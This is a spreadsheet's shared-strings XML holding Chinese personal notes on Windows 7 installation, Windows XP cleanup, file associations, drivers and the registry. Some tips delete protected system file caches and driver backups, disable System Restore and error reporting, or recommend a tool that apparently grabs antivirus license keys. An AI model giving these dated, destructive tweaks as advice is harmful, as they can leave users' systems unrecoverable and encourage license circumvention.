  <si>
    <t>WD table cell</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>初号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>小初</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>小一</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>二号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>小二</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>三号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>小三</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>四号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>小四</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>五号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>小五</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>六号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>小六</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>字号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>磅</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>毫米</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>二号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ctrl+[ or ctrl+shift+&lt;:可实现字体大小快调,在word内;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>小
二</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>三
号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>小
三</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>四
号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>小
四</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>五
号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>小
五</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>六
号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>小
六</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>丈量字符的尺寸</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>丈量字符的尺寸</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows is loading files…(屏幕提示)(约2分钟);</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>starting windows(屏幕提示),出现进度条,(约40钞);</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>选择要安装的语言、时间和货币格式、键盘和输入方法,下一步；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>安装程序正在启动(屏幕提示)；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>选择版本；可选择简易版,家庭普通版,家庭高级版,专业版,旗舰版;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>重启后,安装程序正在更新注册表设置;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>安装程序正在启动服务;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>准备工作</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>安装前相关驱动备份（用驱动精灵或优化大师）；</t>
  </si>
  <si>
    <t>相关帐户设置、软件设置备份（用windows轻松传送）；</t>
  </si>
  <si>
    <t>注2:以上属于收集信息阶段,然后才是安装windows</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>a</t>
  </si>
  <si>
    <t>复制windows文件（所需时间较短）</t>
  </si>
  <si>
    <t>b</t>
  </si>
  <si>
    <t>展开windows文件，13分钟左右，</t>
  </si>
  <si>
    <t>c</t>
  </si>
  <si>
    <t>安装功能,系统文件安装到windows文件夹,系统组件和驱动安装;</t>
  </si>
  <si>
    <t>d</t>
  </si>
  <si>
    <t>安装更新（所需时间较短）</t>
  </si>
  <si>
    <t>注3:完成安装，上述步骤大概40分钟左右；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注4:上述两次重启,如光盘未取出,不需按任何键,如有按键,则会boot from DVD;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统安装完后的后续工作</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>a</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>b</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>c</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>安装程序将在重启后继续</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>(第二次)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>---安装程序正在为首次使用设置---安装程序正在调置视频；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>安装程序将在重启后继续</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>(第一次)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>，此时可取出光盘，如果未取出，系统重启时，会提示：press any key boot from DVD,不需按任何键；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用户名、PC名，设置windows更新设置；时间和日期设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows系统正在完成设置，正在准备桌面；---设置个人设置</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>OFFICE安装；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>共享设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>帐户设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>分区规划；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统环境设置与优化；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>准备好上述备份文件、系统安装盘、常用程序文件数据盘；以及系统安装好的激活密钥(25位的COA认证码);</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>开机按F8,从光驱启动；插入光盘，press any key boot from DVD(屏幕提示);</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注1:(最近在已安装系统的电脑上重新安装无本步骤,可能在新机上安装应该有本步骤)产品密钥，25的COA认证码，旧版windows安装程序必须输入正确的productkey,而新版可选择是否当时输入密钥，如有输入，则根据KEY判断版本； 是否联机激活？（建议安装好再激活）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>现在安装</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>→</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>,(可选择</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>"修复计算机"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>);</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>自定义安装(可选择</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>"升级"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>)；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>设备管理器，检查设备的驱动安装有无异常；特别是显卡驱动不匹配的话，会有诸多问题；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>http://www.freewb.org/</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>输入法设置，字体设置；（推荐极点五笔：http://www.freewb.org/）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>杀毒软件安装；推荐诺顿ESET NOD32 Antivirus，同时安装ID或DEY自动获取工具；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IE设置，包括IE Temp,常用插件（TV or Video Live）,flash player.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>control panel逐项设置:
ategories and icons view不同，如change display language只可在categories看到；include:update\firewall\user accounts\system\taskbar and start menu\region and language\power options\personalization\notification area icons\network and sharing center\internet option\folder option\display\device mangaer\default programs\date and time\fonts.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows easy transer;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>压缩、PDF文件阅读软件安装；WinARA:\Acrobat Reader、adobe reader;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3.如果对系统进行过windoes updade升级，则删除以下文件：</t>
  </si>
  <si>
    <t>x:\windows\下以 $u... 开头的隐藏文件</t>
  </si>
  <si>
    <t>1.打开“我的电脑”-“工具”-“文件夹选项”-“查看”-在“显示所有文件和文件夹”选项前打勾-“确定”</t>
  </si>
  <si>
    <t>2.删除以下文件夹中的内容：“X”代表你的XP安装的位置，一般为C盘。</t>
  </si>
  <si>
    <t>x:\WINDOWS\Temp\下的所有文件(临时文件)</t>
  </si>
  <si>
    <t>x:\WINDOWS\ServicePackFiles(升级sp1或sp2后的备份文件)</t>
  </si>
  <si>
    <t>x:\WINDOWS\SoftwareDistribution\download下的所有文件</t>
  </si>
  <si>
    <t>4.然后对磁盘进行碎片整理，整理过程中请退出一切正在运行的程序</t>
  </si>
  <si>
    <t>5.打开“我的电脑”-右键点系统盘-“属性”-“磁盘清理”-“其他选项”-单击系统还原一栏里的“清理”-选择“是”-ok了</t>
  </si>
  <si>
    <t>10、升级完成发现windows\多了许多类似$NtUninstallQ311889$这些目录，都干掉吧，1x-3xM</t>
  </si>
  <si>
    <t>12、关闭系统还原：系统还原功能使用的时间一长，就会占用大量的硬盘空间。因此有必要对其进行手工设置，以减少硬盘占用量。打开"系统属性"对话框，选择"系统还原"选项，选择"在所有驱动器上关闭系统还原"复选框以关闭系统还原。也可仅对系统所在的磁盘或分区设置还原。先选择系统所在的分区，单击"配置"按钮，在弹出的对话框中取消"关闭这个驱动器的系统还原"选项，并可设置用于系统还原的磁盘空间大小。</t>
  </si>
  <si>
    <t>13、休眠功能会占用不少的硬盘空间，如果使用得少不妨将共关闭，关闭的方法是的：打开"控制面板"，双击"电源选项"，在弹出的"电源选项属性"对话框中选择"休眠"选项卡，取消"启用休眠"复选框。</t>
  </si>
  <si>
    <t>16、清除Internet临时文件：定期删除上网时产生的大量Internet临时文件，将节省大量的硬盘空间。打开IE浏览器，从"工具"菜单中选择"Internet选项"，在弹出的对话框中选择"常规"选项卡，在"Internet临时文件"栏中单击"删除文件"按钮，并在弹出"删除文件"对话框，选中"删除所有脱机内容"复选框，单击"确定"按钮。</t>
  </si>
  <si>
    <t>20、关闭远程桌面："我的电脑"-&gt;"属性"-&gt;"远程"，"远程桌面"里的"允许用户远程连接到这台计算机"勾去掉。</t>
  </si>
  <si>
    <t>22、关闭错误报告：当应用程序出错时，会弹出发送错误报告的窗口，其实这样的错误报告对普通用户而言几乎没有任何意义，关闭它是明智的选择。在"系统属性"对话框中选择"高级"选项卡，单击"错误报告"按钮，在弹出的"错误汇报"对话框中，选择"禁用错误汇报"单选项，最后单击"确定"即可。另外我们也可以从组策略中关闭错误报告：从"运行"中键入"gpedit.msc"，运行"组策略编辑器"，展开"计算机配置→管理模板→系统→错误报告功能"，双击右边设置栏中的"报告错误"，在弹出的"属性"对话框中选择"已禁用"单选框即可将"报告错误"禁用。</t>
  </si>
  <si>
    <t>24、定期清理系统还原点：打开磁盘清理，选择其他选项－&gt;清理系统还原点，点击清理。</t>
  </si>
  <si>
    <t>25、卸载不需要的程序，这个就不用我多说了</t>
  </si>
  <si>
    <t>x:\Documents and Settings\用户名\Cookies\下的所有文件(保留index文件)</t>
  </si>
  <si>
    <t>x:\Documents and Settings\用户名\Local Settings\Temp\下的所有文件(用户临时文件)</t>
  </si>
  <si>
    <t>x:\Documents and Settings\用户名\LocalSettings\TemporaryInternet Files\下的所有文件(页面文件)</t>
  </si>
  <si>
    <t>x:\Documents and Settings\用户名\Local Settings\History\下的所有文件(历史纪录)</t>
  </si>
  <si>
    <t>x:\Documents and Settings\用户名\Recent\下的所有文件(最近浏览文件的快捷方式)</t>
  </si>
  <si>
    <t>x:\WINDOWS\Driver Cache\i386下的压缩文件(驱动程序的备份文件)</t>
  </si>
  <si>
    <t>6、在各种软硬件安装妥当之后，其实XP需要更新文件的时候就很少了。删除系统备份文件吧：开始→运行→sfc.exe /purgecache近3xxM。(该命令的作用是立即清除"Windows 文件保护"文件高速缓存，释放出其所占据的空间)</t>
  </si>
  <si>
    <t>7、删掉\windows\system32\dllcache下dll档(减去200——300mb),这是备用的dll档， 只要你已拷贝了安装文件，完全可以这样做。</t>
  </si>
  <si>
    <t>8、XP会自动备份硬件的驱动程序，但在硬件的驱动安装正确后，一般变动硬件的可能性不大，所以也可以考虑将这个备份删除，文件位于\windows\driver cache\i386目录下，名称为driver.cab，你直接将它删除就可以了，通常这个文件是74M。</t>
  </si>
  <si>
    <t>9、删除不用的输入法：对很多网友来说，Windows XPt系统自带的输入法并不全部都合适自己的使用，比如IMJP8_1 日文输入法、IMKR6_1 韩文输入法这些输入法，如果用不着，我们可以将其删除。输入法位于\windows\ime\文件夹中，全部占用了88M的空间。</t>
  </si>
  <si>
    <t>14、卸载不常用组件：XP默认给操作系统安装了一些系统组件，而这些组件有很大一部分是你根本不可能用到的，可以在"添加/删除Windows组件"中将它们卸载。但其中有一些组件XP默认是隐藏的，在"添加/删除Windows 组件"中找不到它们，这时可以这样操作：用记事本打开\windows\inf\sysoc.inf这个文件，用查找/替换功能把文件中的"hide"字符全部替换为空。这样，就把所有组件的隐藏属性都去掉了，存盘退出后再运行"添加-删除程序"，就会看见多出不少你原来看不见的选项，把其中那些你用不到的组件删掉（记住存盘的时候要保存为sysoc.inf，而不是默认的sysoc.txt），如Internat信使服务、传真服务、Windows messenger，码表等，大约可腾出近50MB的空间。</t>
  </si>
  <si>
    <t>15、清除系统临时文件：系统的临时文件一般存放在两个位置中：一个Windows安装目录下的Temp文件夹；另一个是x:\Documents and Settings"用户名"\Local Settings\Temp文件夹(Y:是系统所在的分区)。这两个位置的文件均可以直接删除。</t>
  </si>
  <si>
    <t>17、清除预读文件：Windows XP的预读设置虽然可以提高系统速度，但是使用一段时间后，预读文件夹里的文件数量会变得相当庞大，导致系统搜索花费的时间变长。而且有些应用程序会产生死链接文件，更加重了系统搜索的负担。所以，应该定期删除这些预读文件。预计文件存放在Windows XP系统文件夹的Prefetch文件夹中，该文件夹下的所有文件均可删除。</t>
  </si>
  <si>
    <t>18、压缩NTFS驱动器、文件或文件夹：如果你的硬盘采用的是NTFS文件系统，空间实在紧张，还可以考虑启用NTFS的压缩功能。右击要压缩的驱动器－"属性"－"常规"－"压缩磁盘以节省磁盘空间"，然后单击"确定"， 在"确认属性更改"中选择需要的选项。这样可以节省约20% 的硬盘空间。在压缩C盘的时候，最好在安全模式下压缩，这样效果要好一些。</t>
  </si>
  <si>
    <t>19、关闭华医生Dr.Watson：要关闭Dr.Watson可打开注册表编辑器，找到"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AeDebug"分支，双击其下的Auto键值名称，将其"数值数据"改为0，最后按F5刷新使设置生效，这样就取消它的运行了。也在"开始"-&gt;"运行"中输入"drwtsn32"命令，或者"开始"-&gt;"程序"-&gt;"附件"-&gt;"系统工具"-&gt;"系统信息"-&gt;"工具"-&gt;"Dr Watson"，调出系统里的华医生Dr.Watson ，只保留"转储全部线程上下文"选项，否则一旦程序出错，硬盘会读很久，并占用大量空间。如以前有此情况，请查找user.dmp文件，删除后可节省几十MB空间。</t>
  </si>
  <si>
    <t>21、取消XP对ZIP支持：Windows XP在默认情况下打开了对zip文件支持，这要占用一定的系统资源，可选择"开始→运行"，在"运行"对话框中键入"regsvr32 /u zipfldr.dll"，回车确认即可取消XP对ZIP解压缩的支持，从而节省系统资源。</t>
  </si>
  <si>
    <t>23、关掉不用的设备：Windows XP总是尽可能为电脑的所有设备安装驱动程序并进行管理，这不仅会减慢系统启动的速度，同时也造成了系统资源的大量占用。针对这一情况，你可在 设备管理器中，将PCMCIA卡、调制解调器、红外线设备、打印机端口(LPT1)或者串口(COM1)等不常用的设备停用，方法是双击要停用的设备，在其属性对话框中 的"常规"选项卡中选择"不要使用这个设备(停用)"。在重新启动设置即可生效，当需要使用这些设备时再从设备管理器中启用它们。</t>
  </si>
  <si>
    <t>系统瘦身和清理</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注册表设置和服务设置：
单击开始菜单的运行命令，在打开的对话框中输入services.msc，打开服务管理器。查找远程注册表服务（Remote Registry），将启动方式设置为禁用。打开开始菜单并单击运行命令，在运行对话框中输入“regedit”,打开注册表编辑器。在HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services下，删除Remote Registry。重启计算机使配置生效。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">2、删除：x:\WINDOWS\Driver Cache\i386下的压缩文件(驱动程序的备份文件) </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3、XP会自动备份硬件的驱动程序，但在硬件的驱动安装正确后，一般变动硬件的可能性不大，所以也可以考虑将这个备份删除，文件位于\windows\driver cache\i386目录下，名称为driver.cab，你直接将它删除就可以了，通常这个文件是74M。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4、删除不用的输入法：对很多网友来说，Windows XPt系统自带的输入法并不全部都合适自己的使用，比如IMJP8_1 日文输入法、IMKR6_1 韩文输入法这些输入法，如果用不着，我们可以将其删除。输入法位于\windows\ime\文件夹中，全部占用了88M的空间。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>6、卸载不常用组件：XP默认给操作系统安装了一些系统组件，而这些组件有很大一部分是你根本不可能用到的，可以在"添加/删除Windows组件"中将它们卸载。但其中有一些组件XP默认是隐藏的，在"添加/删除Windows 组件"中找不到它们，这时可以这样操作：用记事本打开\windows\inf\sysoc.inf这个文件，用查找/替换功能把文件中的"hide"字符全部替换为空。这样，就把所有组件的隐藏属性都去掉了，存盘退出后再运行"添加-删除程序"，就会看见多出不少你原来看不见的选项，把其中那些你用不到的组件删掉（记住存盘的时候要保存为sysoc.inf，而不是默认的sysoc.txt），如Internat信使服务、传真服务、Windows messenger，码表等，大约可腾出近50MB的空间。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>7、关掉不用的设备：Windows XP总是尽可能为电脑的所有设备安装驱动程序并进行管理，这不仅会减慢系统启动的速度，同时也造成了系统资源的大量占用。针对这一情况，你可在 设备管理器中，将PCMCIA卡、调制解调器、红外线设备、打印机端口(LPT1)或者串口(COM1)等不常用的设备停用，方法是双击要停用的设备，在其属性对话框中 的"常规"选项卡中选择"不要使用这个设备(停用)"。在重新启动设置即可生效，当需要使用这些设备时再从设备管理器中启用它们。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5、另外，保留着\windows\help目录下的东西对我来说是一种伤害！</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统还原设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>给系统瘦身，卸载一些用不着的绑定组件（具体请看http://xflgame.blog.sohu.com/86237282.html）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件关联、默认程序、打开方式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件关联是指打开一种类型的文件的默认程序，可以通过注册表去实现。右击目标文件，选择打开方式，便可选择相应的应用程序去打开该类型的文件；恢复文件关联有两个方法：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 文件右击---属性---常规：更改：选择对应程序；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 修改注册表</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 文件夹选项---文件类型---选择类型---更改或高级修改默认打开方式：
    或文件夹选项---文件类型---新建---高级选项卡---关联的文件类型：选择；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    1 classesRoot下有许多“.XXX”扩展名主键,如".txt",它的键值是txtfile,指明了txt文件类型关联设置的主键;主键下还有两个主键:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">        3.2 Shell主键下有command主键,其默认值青筋来定义此种类型的文件关联的执行程序,比如TXT文件的command主键的默认键值是%systemRoot%\system32\note.exe %1,也就是告诉系统使用notepad.exe来打开TXT文件,%1是指双击打开文件,否则只是打开相的程序;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">        3.1 DefaultIcon主键:其默认是用来设置文件类型图标的,通常会使用关联程序内置的图标,以方便识别;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">        3.3 关联还原:带命令提示符的安全模式:ftype exefile正常就是:exefile="%1" %x;如果不是则输入:exefile="%1" %*,assoc.exe,正常应是.exe=exefile,如果不是则assoc .exe=exefile,重启后即可;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注1:同类型的文件在文件开始处都有一个相同的特征码,用支持16进制的编辑器,如WINHEX,打开可看到特征码,如ZIP文件的特征码是"PK";</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注2 有时一种文件类型可以用多种安装的程序打开,双击后打开某文件的程序,是该类型文件的默认程序,如果选择其它程序去打开该种类型的文件,可以选择:打开方式:open with.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件关联、默认程序、打开方式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>斜杠/(下):用于IE地址和DOS参数(参数前用/,/前有空格);</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>反斜杠\(上):文件本地路径,本地硬盘资源管理器路径;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>全角(圆月)与半角(半月)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 英文状态下全是半角;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 中文状态下可以显示全角也可以显示半角,全角是指把字母\符号\数字当作汉字处理,占两个英文字符位置,与汉字等宽,全角字符只能做文字处理,不能做命令字,全角下的密码往往无法识别;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>驱动(driver)</t>
  </si>
  <si>
    <t>1 驱动安装类型</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 与BIOS一起固化在ROM中,如CPU,内存、软驱，显卡也有BIOS；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 Windows系统自带，在安装系统时就一起安装了这些驱动；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 通过随硬件附带的安装盘；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4 网站下载或在其它windows系统中获取。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 安装方式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 通过附带的驱动盘的setup.exe或install.exe文件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 手动安装打印驱动：打印机和传真---添加打印机---只勾选：连接到这台PC的本地打印机---使用的端口（默认）---</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 选择打印机的厂商，具体型号；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 从磁盘安装---插入盘---浏览---确定---打印机命名；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 更新驱动：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>设备管理器---展开某硬件，右击---属性---驱动程序选项卡---浏览计算机以查找驱动软件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>驱动是可以让计算机和设备通信的特殊程序，操作系统只有通过驱动这个接口，才能控制硬件的工作，驱动完成硬件电子信号与操作系统以及软件的高级编程语言之间的相互翻译，如操作系统需使用某个硬件时，如让声卡播放音乐：1 操作系统会先发送相应指令到声卡驱动程序；2 声卡驱动将指令翻译成声卡才能听懂的电子信号命令；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>备注1：设备的驱动可能会与系统不兼容，需卸载重装；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>备注2：HP DV2000需下载此型号的显卡驱动才可以有透明效果；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>备注4：用启动盘启动PC到DOS后，能否访问光驱，取决于启动盘中启动文件是否包括了光驱驱动；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>备注3：即插即用驱动：是指驱动会被系统自动安装；即插即用功能只有在同时具备了符合4个条件时才可以：即插即用的标准BIOS、即插即用的操作系统、即插即用的设备和即插即用的驱动程序。当系统中加入新设备时，即插即用管理器能够判断出相应的设备驱动程序并实现驱动程序的自动加载。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>驱动(driver)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注册表regedit</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注册表是操作系统、各种硬件和用户安装的各种应用程序得以正常运行的核心数据库；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>当了应用程序或添加了新的硬件时，安装程序或设备驱动程序就要向注册表添加新的配置信息；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows启动时，对过注册表查找所有硬件设备的驱动程序，然后将其全部加载到系统，加载后，硬件设备驱动程序将直接运行；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如果用户需要启动某个应用程序，注册表将会给windows系统提供与该应用程序相关的环境信息，系统据此完成相应的配置检查，并运行该应用程序；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注册表的意义：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>解决电脑觉故障；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>提高电脑系统性能，当OS设置对硬件系统来说比较保守时，便可通过修改注册表达到提高系统性能的目的；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>便于电脑进行网络管理；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注册表设置的内容：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>个性化设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬件和软件设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>安全设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统优化设置；</t>
